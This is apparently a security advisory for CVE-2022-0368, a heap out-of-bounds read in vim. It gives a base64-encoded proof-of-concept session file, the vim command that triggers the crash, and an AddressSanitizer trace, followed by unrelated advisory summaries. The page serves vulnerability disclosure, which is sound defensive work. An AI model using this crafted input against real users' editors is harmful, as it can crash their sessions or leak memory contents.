Headline
CVE-2022-0368: Out-of-bounds Read in vim
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
Description
A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regardless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build (lastest commit hash 8e4af851fd3eff4b22fca962e5be783742e8f1bb) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
Here is the smallest poc we were able to produce (it is base64 encoded since it contains some unprintable characters, it’s also fairly large, but we haven’t been able to minimize it further):
$ echo -ne "ZGVGEDAw7sow////f5kwMDAwMDAwMDAwMDAwMDAKICBkZWYwMDAwMDAwMDAwMDAwMDAwMDAwMDDe
AAojf+QwMDAwMDAwlo0wMDAwMDAwMDAwMApbCiBzaWwhbm9ybTBlZW5kcyBzaWwhbm9ybTBSHirt
kTB7DS8vA1ZubyAgbm9yCjB1CnN1ISowMDAwMDAwCnNpbCFub3JthyogKiBub3Iwbm+Nks+KZHN1
ISosKgtub35tMHUJc2n/AApzaQAKICBkZWYgU2Vjb25kRnVuY3RpwTAwMDAwMDAwMDAwMDCsMDAw
KDAJMDAwMDAwMDAwMDAwMDAwMDAwMDAwCm4=" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
#0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
#1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
#2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
#3 0x55b8deba0a6c in ml_append_flags /home/faraday/vim/src/memline.c:3358
#4 0x55b8deba0956 in ml_append /home/faraday/vim/src/memline.c:3345
#5 0x55b8de739794 in open_line /home/faraday/vim/src/change.c:2139
#6 0x55b8dec75acf in n_opencmd /home/faraday/vim/src/normal.c:6528
#7 0x55b8dec8320e in nv_open /home/faraday/vim/src/normal.c:7664
#8 0x55b8dec3ab1f in normal_cmd /home/faraday/vim/src/normal.c:1120
#9 0x55b8de9972ac in exec_normal /home/faraday/vim/src/ex_docmd.c:8629
#10 0x55b8de99706b in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8592
#11 0x55b8de996589 in ex_normal /home/faraday/vim/src/ex_docmd.c:8510
#12 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#13 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#14 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#15 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#16 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#17 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#18 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#19 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#20 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#21 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#22 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#23 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#24 0x55b8de6c0cbd in _start (/home/faraday/vim/src/vim+0x125ccbd)
0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
#0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
#2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
#3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
#4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
#5 0x55b8df128fec in u_undoredo /home/faraday/vim/src/undo.c:2811
#6 0x55b8df1262cb in undo_time /home/faraday/vim/src/undo.c:2563
#7 0x55b8de991611 in ex_undo /home/faraday/vim/src/ex_docmd.c:7979
#8 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#9 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#10 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#11 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#12 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#13 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#14 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#15 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#16 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#17 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#18 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#19 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
0x0c047fff9060: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9080: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa 03 fa fa fa 00 05
=>0x0c047fff90b0: fa fa fd fa fa fa[01]fa fa fa 01 fa fa fa fd fd
0x0c047fff90c0: fa fa 00 01 fa fa fd fa fa fa fd fd fa fa 01 fa
0x0c047fff90d0: fa fa 00 03 fa fa 01 fa fa fa fd fa fa fa fd fa
0x0c047fff90e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 01
0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9100: fa fa 02 fa fa fa 00 01 fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==52803==ABORTING
Impact
This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related news
Ubuntu Security Notice 6026-1 - It was discovered that Vim was incorrectly processing Vim buffers. An attacker could possibly use this issue to perform illegal memory access and expose sensitive information. This issue only affected Ubuntu 20.04 LTS. It was discovered that Vim was using freed memory when dealing with regular expressions inside a visual selection. If a user were tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service, or possibly achieve code execution with user privileges. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.